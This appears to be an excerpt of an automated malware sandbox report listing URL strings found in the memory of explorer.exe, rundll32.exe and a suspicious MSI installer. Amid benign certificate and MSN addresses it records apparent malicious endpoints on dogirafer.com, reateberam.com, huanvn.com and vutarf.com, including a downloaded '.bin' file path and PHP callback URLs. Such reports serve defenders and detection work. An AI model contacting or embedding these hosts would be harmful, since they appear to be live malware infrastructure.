Source: explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000009.00000002.4156562592.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: explorer.exe, 00000009.00000002.4156562592.000000000CA63000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab=
Source: explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000009.00000000.1924820436.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1932111599.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1923210820.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000009.00000000.1934799200.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000009.00000002.4143464537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000009.00000002.4143464537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000009.00000002.4141948811.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1921523688.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4140702532.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000002.4147116004.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000002.4147116004.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000009.00000003.3106528073.000000000CB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/
Source: explorer.exe, 00000009.00000003.3064403345.000000000CB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/3
Source: explorer.exe, 00000009.00000003.3468545748.000000000CB32000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/3p
Source: explorer.exe, 00000009.00000003.3105393162.000000000CB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3106653549.000000000CB3D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3106528073.000000000CB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/6122658-3693405117-2476756634-1002
Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/6122658-3693405117-2476756634-1002q
Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/CD
Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/F
Source: explorer.exe, 00000009.00000003.3105893826.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105393162.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/files/stkm.bin
Source: explorer.exe, 00000009.00000002.4156528625.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3181105020.00000000087C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105393162.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/
Source: explorer.exe, 00000009.00000002.4154916178.000000000C54A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/%
Source: explorer.exe, 00000009.00000002.4148681254.0000000009BFE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/0
Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/36P
Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/56J
Source: explorer.exe, 00000009.00000003.3468352135.000000000C9D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/H
Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/KB
Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/_D
Source: explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/l6m
Source: explorer.exe, 00000009.00000002.4148263882.0000000009A10000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/ser-l1-1-0
Source: explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/
Source: rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/3
Source: rundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.php
Source: rundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.phpf
Source: rundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/gop.phpw
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/
Source: explorer.exe, 00000009.00000003.3092452883.0000000009070000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2903762845.0000000008750000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3152054536.0000000009080000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3181105020.00000000087C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/
Source: explorer.exe, 00000009.00000003.2903762845.0000000008750000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/3155509_577958930160_4374071URLS1https://dogirafer.com/test/2006230_2943
Source: explorer.exe, 00000009.00000003.3152054536.0000000009080000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/5285504_70103146102045_6870568URLS1https://dogirafer.com/test/7527773_96
Source: explorer.exe, 00000009.00000003.3181105020.00000000087C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/5351441_21349625930948_9623822URLS1https://dogirafer.com/test/8025589_88
Source: explorer.exe, 00000009.00000003.3092452883.0000000009070000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/9001616_28662416912457_9237360URLS1https://dogirafer.com/test/5693052_67
Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105655586.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/G
Source: explorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105655586.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/W
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: rundll32.exe, 00000005.00000002.4144009305.00007FFDF91DD000.00000002.00000001.01000000.00000005.sdmp, avutil.dll.1.dr	String found in binary or memory: https://streams.videolan.org/upload/
Source: rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com/
Source: rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com/Z
Source: rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com/s
Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.php
Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.php:N
Source: rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.phpE
Source: rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vutarf.com:6542/stop.phpXw
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.4154916178.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
